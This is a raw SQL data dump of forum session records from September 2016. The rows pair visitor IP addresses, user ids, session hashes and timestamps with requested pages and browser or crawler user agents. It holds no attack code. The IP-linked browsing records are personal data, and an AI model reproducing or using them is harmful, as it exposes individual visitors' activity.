('babc7091acbaaed657b307c6d1a02973', 0, '1.172.236.193', '4c46ca6932a8abf6fe87f4b1cf2bf0c3', 1472738872, '/index.php', 'Mozilla/5.0 (X11; Gentoo; rv:48.0) Gecko/20100101 Firefox/48.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('deee0b121bf3b52ae4a057b2f89ad6cd', 0, '1.172.236.193', 'b3f48f30669fb008a03b02e805279197', 1472739041, '/showthread.php?p=3045', 'Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.26.31 (KHTML, like Gecko) Chrome/56.0.2718.13 Safari/5', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('125bcd6b87a72e13fb0f47a7c8749353', 0, '172.68.11.203', '729880fac1123bf71fad1e6bc2e621a3', 1472745483, '/showthread.php?p=2928', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('34bc0854808c6402fc8bcd5da2b3dcd0', 0, '211.110.146.5', 'eed83f1acaaee5a6fc58163a7313f138', 1472750303, '/login.php?do=login&do=login', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('1a4951e246656a1c62a2db3d9c99b3ac', 0, '79.179.96.212', '10bfa8265d3fa5379f622e3124e2f6b4', 1472751157, '/register.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:44.0) Gecko/20100101 Firefox/44.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('24585016a70d6bd0a1340c5764af3902', 145, '79.179.96.212', '17e2c8f1522dd60e36bc9e05b49b207c', 1472751217, '/group.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2', 0, 0, 2, 0, 0, 0, 2, 0, 0),
('34b989862e4cf210344386919a64c792', 133, '172.68.58.97', '6e9dca07b2c2f4e35c2c80298e236a58', 1472778842, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('b1bcf524bd43f5dec9fd37950886e7b6', 0, '190.193.113.171', '804f350a226a78e2cc52b28cd71b3294', 1472779103, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('5bf71abb1015cc77ff1bdc0863f2bb74', 0, '1.54.210.199', 'a764540776c7b5ada3a8b4543f3d80b7', 1472796984, '/index.php?', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/5', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('8085f9c194dd3352db982c13865dc2d3', 161, '54.233.145.152', 'd8752cf67051540a22ada9c27a70dc20', 1472797237, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2', 0, 0, 2, 0, 0, 0, 2, 0, 0),
('09b7a8ede3fe8e3c85d1f8bb7f7aacce', 0, '213.7.212.58', '0e8df16bba256227dda437f7680bda85', 1472800931, '/showthread.php?p=3012', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('1d1942da41ed637ee5ba261eca3577f0', 0, '162.213.27.113', '4619f278614bde5268e2601cf9cd2aa6', 1472803071, '/search.php?do=getnew', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('9834be080f6b8ce6ee71f9d18b8c469a', 0, '2001:1af8:4700:', '6ea240a1d0232af44098a8a439b77d34', 1472805920, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('c9fdc9699b2cb98f48040204b9eb39cc', 0, '168.1.6.49', '384d3f8b11c882d74abe09ee0522f822', 1472812754, '/search.php?searchthreadid=2469', 'Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Iceweasel/38.7.1', 0, 1, 0, 0, 0, 0, 2, 0, 0),
('c0f5536bf5cf0c73d1d71e0e48625c17', 0, '82.26.149.19', 'f79da0cda2ccc2d81244dc4a576bd657', 1474628249, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('f75fd33dcec3389827f81ed0937edbb5', 0, '24.251.240.218', '8698c0e95f1292c1e1452cb2c9b1dd24', 1472814200, '/register.php', 'Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_5 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Ver', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('593351de7210cdbf7d7681f96199630e', 0, '172.68.58.76', 'df84d96b89f8b79650eae32ae80c767b', 1472817381, '/faq.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('d578d33a18b38bc04c8658b3208773c9', 0, '172.68.58.127', 'bac01e091a7fab46ae16fdd15ba2f449', 1472820556, '/login.php?do=login&do=login', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('a8aff3cefe1af113ba3d2e8e918e2625', 133, '172.68.58.97', '6e9dca07b2c2f4e35c2c80298e236a58', 1472822047, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('183ac3114f30bf1bef03d4aaf5e61e08', 0, '151.237.234.64', '3eed55a1cc006252e0d1db3bcf7bbe32', 1472826762, '/index.php?', 'Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('ddbd9140a9f2b78b3cac8ae8fccdd03b', 0, '46.211.136.205', 'b050b22036654a9028aa0be8c6e73a7f', 1472829457, '/register.php', 'Mozilla/5.0 (Linux; Android 6.0.1; GT-I9505 Build/MOB30Z) AppleWebKit/537.36 (KHTML, like Gecko) Chr', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('acdadefa2b58b0f533f371d19bba4c75', 0, '73.85.203.170', 'db529213644da8eaf946499783847b44', 1472846783, '/register.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('8d25d6c20ea41f9ea5e61d565a486e8b', 0, '192.226.144.8', 'df7dcb71ba11fb32a773c9946d5f1fe4', 1472853050, '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('ae313cf881fc606dda4aac857f58e95d', 133, '172.68.58.97', '6e9dca07b2c2f4e35c2c80298e236a58', 1472865148, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('a1e79311815944b04ccdfc3204ee5e26', 0, '207.46.13.90', '5e207e311e22cdc3b2095126a922fa93', 1473499625, '/archive/index.php/f-38.html', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 1, 0),
('d701357c74485349874ca767da915db7', 0, '163.172.65.115', '434c6b454a7f31b7f864273ebcc5c029', 1472876670, '/index.php', 'Mozilla/5.0 (compatible; AhrefsBot/5.1; +http://ahrefs.com/robot/)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('d2e4c8461988e081d39de69e2d5450a4', 0, '2a02:598:2::109', '6f35e5d5915c4b1a4ae54b63391d706a', 1474785683, '/index.php', 'Mozilla/5.0 (compatible; SeznamBot/3.2; +http://napoveda.seznam.cz/en/seznambot-intro/)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('c3f020b3aedb25bbccaae5e682a9b114', 0, '41.190.29.1', '3fe4351468640b1fdbf9b88147e47e53', 1472898163, '/login.php?do=login&do=login', 'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('f02e54a3935fa90ad1e42af5d767b9e2', 0, '169.159.111.111', 'c1ddd8d620c6f8b5d5a8cc371d4428f8', 1472898387, '/memberlist.php?', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('90e7d2088a29c4c96894d0202a4cc523', 133, '172.68.58.97', '6e9dca07b2c2f4e35c2c80298e236a58', 1472908345, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('bf0aa2d4e9d982aec491b0ac9a1eb11e', 0, '209.66.119.150', 'a159ca853d3ea287ff9a5bba92ddd11a', 1472914016, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('075567af495a966ea9a328a8d27e496c', 0, '172.98.87.20', '79abbbc02f37f0974a86ff7e8fb8eda1', 1472927176, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.11', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('d01533002498b1fc9bdf95e2750aca1d', 0, '86.127.246.75', 'cececc682a8155761c0a6555a3439354', 1472935669, '/search.php?do=getnew', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('73bacfb069bd9dd5d84a52b00252ffac', 0, '173.255.161.43', 'b52453850c94ce11fe6eb7dfee2a9672', 1472938529, '/showthread.php?p=3046', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('0502a9f9ca09f6774b0dbafa35b99c15', 0, '190.193.124.85', '5011df1027aa8ccfe98858950e15b80b', 1472943490, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('da9c4e49ee373c33204b0a1785765e5d', 0, '189.172.40.225', 'bb70115ab555f24516a32948d7207e52', 1472944353, '/index.php', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('f2cff095b268a17dcc2ae57a27e83708', 133, '172.68.58.97', '6e9dca07b2c2f4e35c2c80298e236a58', 1472951033, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('27172314c3d25b91b1a1af98b546049a', 0, '158.69.59.189', '09e9b9ba8c930ccea8bbfa99246c3f7a', 1472956423, '/memberlist.php', 'Mozilla/5.0 (Android; Mobile; rv:37.0) Gecko/37.0 Firefox/37.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('d35f646624232695bc2563221ffe3edb', 0, '157.55.39.209', '23f3103f44bc3badcba53554e5e4cb6d', 1474246939, '/search.php?do=getnew', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('057851987679910524c05bc968d86dc2', 0, '40.77.167.42', 'c5490a5a8e1813ac25cf9e19091dcb85', 1473156818, '/misc.php?do=showsmilies', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('f49a86e15eef6e6f6304fbd5b2340aa1', 133, '172.68.58.97', '6e9dca07b2c2f4e35c2c80298e236a58', 1472993904, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('7a084c5c21b9416f177ca9fbdfafb73a', 0, '105.112.40.159', 'c693b1d69ca143dd7b89c68d4b76de8e', 1473003642, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('0102756c9720b15158ef8b54d212234e', 0, '66.249.64.36', '881de0811167d68e6f4733be9b8109c2', 1473025566, '/index.php', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('a4ce0abc88b811969cea0ebae18f6f0b', 0, '66.249.64.42', '881de0811167d68e6f4733be9b8109c2', 1473049148, '/index.php?langid=2', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('4c2349d49532755dd8070eea1b2f8d1c', 0, '119.30.32.206', '643cd8632f0cbd7969c92724682584f5', 1473014546, '/index.php', 'Mozilla/5.0 (Linux; Android 6.0.1; A0001 Build/MHC19Q) AppleWebKit/537.36 (KHTML, like Gecko) Chrome', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('0466ab5708d49ed781fc873d937ec528', 0, '82.12.126.191', '80f8241dacceebacc08dd39639166c92', 1473017052, '/memberlist.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Saf', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('2f5d8d17da2ced657c77d0be7e804dec', 0, '66.249.64.39', '881de0811167d68e6f4733be9b8109c2', 1473025565, '/archive/index.php/t-1856.html', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 1, 0),
('a081f294666b23dacd644c9bf56da2e7', 0, '66.249.64.39', 'b74d0bcf4e50a120a01910c89bfe2d08', 1473018250, '/index.php', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chr', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('96561fbfb6d05d5a32d1a3a25c7dfae4', 0, '158.181.29.32', 'e305628af87f13f77d5b956cd9ca22cd', 1473018528, '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('e4bc5ae6b89c4863a0f0332a7482438e', 0, '154.121.251.120', '0889eb5748d0935d656f1872b1b5891c', 1473023263, '/search.php?do=getnew', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('ff7ab1eb4134f902a5adf82a7a8500c5', 0, '66.249.64.44', '881de0811167d68e6f4733be9b8109c2', 1473043428, '/archive/index.php/t-1856.html', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 1, 0),
('079c3ea7b328e9ef6a984f566ad92f95', 133, '172.68.58.97', '6e9dca07b2c2f4e35c2c80298e236a58', 1473036609, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('763bca79b11c511069ad64edc1704409', 0, '66.249.64.46', '881de0811167d68e6f4733be9b8109c2', 1473067528, '/member.php?u=162&langid=2', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('eca13cbe14b52268df878e6bbf7639a4', 0, '200.111.107.58', '13fc4e0114ed795f6a4d6528459098b9', 1473048723, '/index.php', 'python-requests/2.10.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('ffae4a72fa2dd64d6e1818962e58922e', 0, '66.249.73.188', 'd8a3621051418f62d9ffdc31af6b58df', 1473801944, '/showthread.php?p=2936', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('39590900e2940b9f643315805c5ef166', 133, '172.68.58.97', '6e9dca07b2c2f4e35c2c80298e236a58', 1473079529, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('b6f1be802ce89da0703c02d540c5f2f5', 0, '66.249.73.131', 'd8a3621051418f62d9ffdc31af6b58df', 1474929501, '/showthread.php?t=1856', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('63acb2f5d9747a364eb8e31d3a985667', 0, '31.24.221.3', 'fb0a45c28cf6a765ac4bf4c037487c8f', 1474539772, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('b0f297fb1c7a8b6540994ed0d9a03311', 0, '50.88.84.163', '79fcc354dd4cdc711eede116da436154', 1473087660, '/index.php', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('b0c282ba75ef92f88d0518888ed3e841', 0, '66.249.73.172', 'd8a3621051418f62d9ffdc31af6b58df', 1473674999, '/index.php', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('695e37f8b936acc4b79c303dc8a8e907', 0, '221.147.140.179', 'e9b60cd2e70ce48b6244dc0697596d50', 1473088227, '/register.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('b089ad0b47569b8b01810507212cdf43', 0, '37.17.113.29', '3fa1d91dcc10dcb0e003e8cfa1c2bb1c', 1473094524, '/index.php', 'Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; ASU2JS; rv:11.0) like Gecko', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('6a54c9c3e2f3692d0d57adc1c951815f', 0, '94.41.150.9', '35cc633730d7d322fe695a0a5f3219e6', 1473101199, '/showthread.php?p=2928', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Saf', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('4a31e03d13e258875ded95e354fb58a6', 0, '151.31.61.95', 'd664a3e8022d75a65fd81094c867e99e', 1473112083, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.11', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('afbac795f025be9aabeae9ad61cf3131', 0, '66.249.73.180', 'd8a3621051418f62d9ffdc31af6b58df', 1473683008, '/index.php', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('f01555d85f429ba9b058a636e1f5d486', 133, '172.68.58.97', '6e9dca07b2c2f4e35c2c80298e236a58', 1473122591, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('3824ebfd4fc553bb6835cdbc6ebed19b', 0, '185.29.9.170', '475c8d1096628341f42e7b04dc466767', 1473126413, '/showthread.php?t=1030', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/53', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('6b14d00a68331cd616574880911c883f', 0, '104.173.16.191', '35f6ad209a47a38b5c81a88821449882', 1473128384, '/faq.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('979d7c6e61caefcf4571ebe7ec369b4c', 0, '188.51.167.205', 'eb4ea89496213750af494172528bd072', 1473128966, '/index.php', 'Mozilla/5.0 (Linux; Android 4.2.1; A900 Build/JOP40D) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('87d3398ba1c6c65ab91b33c3f790144a', 0, '46.246.35.109', '73c78f4e71edca9771c0a6f1e68a0bb8', 1473140125, '/showthread.php?p=3045', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('d9466980fea8a15c9fa1a571dc80c12d', 0, '66.249.73.176', 'd8a3621051418f62d9ffdc31af6b58df', 1473650932, '/index.php', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('62655e04c1d3082f79f8c8d42ce23e16', 0, '157.55.39.103', '23f3103f44bc3badcba53554e5e4cb6d', 1473156817, '/member.php?u=1', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('d717912ef823566bdf0775eaa45ea4e2', 0, '94.191.188.170', 'a291ac672705b87f7533e068df12ba91', 1473157356, '/index.php', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5 Build/MOB30Z; wv) AppleWebKit/537.36 (KHTML, like Gecko)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('e465cc576477b98d87fccab9cae707a2', 0, '51.255.65.33', '54b1916a6165416b6f9562acbd8c87bd', 1473157435, '/showthread.php?t=1835', 'Mozilla/5.0 (compatible; AhrefsBot/5.1; +http://ahrefs.com/robot/)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('402120756b5ab042f4a83e221fe95f90', 0, '163.172.65.216', '434c6b454a7f31b7f864273ebcc5c029', 1473157741, '/faq.php', 'Mozilla/5.0 (compatible; AhrefsBot/5.1; +http://ahrefs.com/robot/)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('c8f4dd23460af98c49e17619bb6d0ca3', 0, '163.172.65.41', '434c6b454a7f31b7f864273ebcc5c029', 1473157777, '/search.php?do=getnew', 'Mozilla/5.0 (compatible; AhrefsBot/5.1; +http://ahrefs.com/robot/)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('2a060d240a2f48642ee115ce0ce3faff', 0, '66.249.73.136', 'd8a3621051418f62d9ffdc31af6b58df', 1473685571, '/index.php', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('6670760af89eda23db86cdb3812fa8cd', 0, '157.55.39.2', '23f3103f44bc3badcba53554e5e4cb6d', 1473161085, '/printthread.php?t=2342', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('3ce0c232eb4e44595c548de93e8eb1f7', 133, '172.68.58.97', '6e9dca07b2c2f4e35c2c80298e236a58', 1473165540, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('93c19e292d2719feb4e5565d24767c2c', 0, '172.68.11.197', '3401f6ed638dd1d46451c0484fc2c985', 1473168408, '/showthread.php?t=1841', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Maxthon/4.4.8.1000 Chrome', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('99ee12b1a3a019603a510c7d21fdc415', 0, '83.32.88.180', '29c312e1129e4d55616599b72adfdad7', 1473178924, '/showthread.php?t=1030', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.11', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('21a155db9d8d99e998edab27288841a5', 0, '89.3.149.226', '29bdc5efa26685b2c9cb76cff6d2bd78', 1473184972, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/601.2.7 (KHTML, like Gecko) Version/9.0.', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('006de47b820f8b5463948abf905625b8', 0, '68.180.228.58', '9d8a8ad3406087c14548478984f3ed76', 1473631767, '/misc.php?do=showrules', 'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('deb6bba9b86da2dfa5632cdac616fe23', 0, '92.40.88.39', '7f1287e6e24542bc410ca9c878c6fc43', 1473191433, '/index.php', 'Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('b0f122063c2c7483ba2c5014b8f23870', 0, '177.167.195.188', '337578c293b1b5822f4d47e3f211d133', 1473196538, '/index.php', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-G930F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chr', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('d686c349581a83c020e5a0321daf445c', 0, '2607:f358:1f:13', 'cc54f2865d92c642007069a17eebbfc7', 1473203871, '/faq.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('52f7f80c60f32b27f6ec27d76eb80d3e', 0, '2607:f358:1f:13', 'e677c9b84375fdfc7d43986ed9f4eb4b', 1473203857, '/index.php', 'Mozilla/5.0 (X11; Linux x86_64; rv:10.0) Gecko/20150101 Firefox/20.0 (Chrome)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('7e7d66db715e24ee264f5eae0230c93f', 0, '95.85.22.84', 'a572a493cd1d4e191b70e38bf22aa39f', 1473207200, '/index.php', 'SafeDNSBot (https://www.safedns.com/searchbot)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('8fda6cc2b880752d7da22ac67121caaa', 0, '99.3.120.34', 'cdce5cb5ef8f64942e403d3be43eed9d', 1473208388, '/memberlist.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('bea3bf30b72333b85e2c6c6433881f08', 133, '172.68.58.97', '6e9dca07b2c2f4e35c2c80298e236a58', 1473208198, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('98473e40a7c3e0a0d0b0aca465ceec1a', 0, '41.227.179.113', 'c739b300647c69f38ad8eb032ecb8bd3', 1473238657, '/index.php', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('39d6d27ffacd934203215857f6040e4f', 0, '210.152.242.188', 'c269324714dccfd227825ce9f811d441', 1473239459, '/showthread.php?p=3005', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('0502c5c55cf2afdb7f140c7ff84203d3', 133, '172.68.58.97', '6e9dca07b2c2f4e35c2c80298e236a58', 1473251368, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
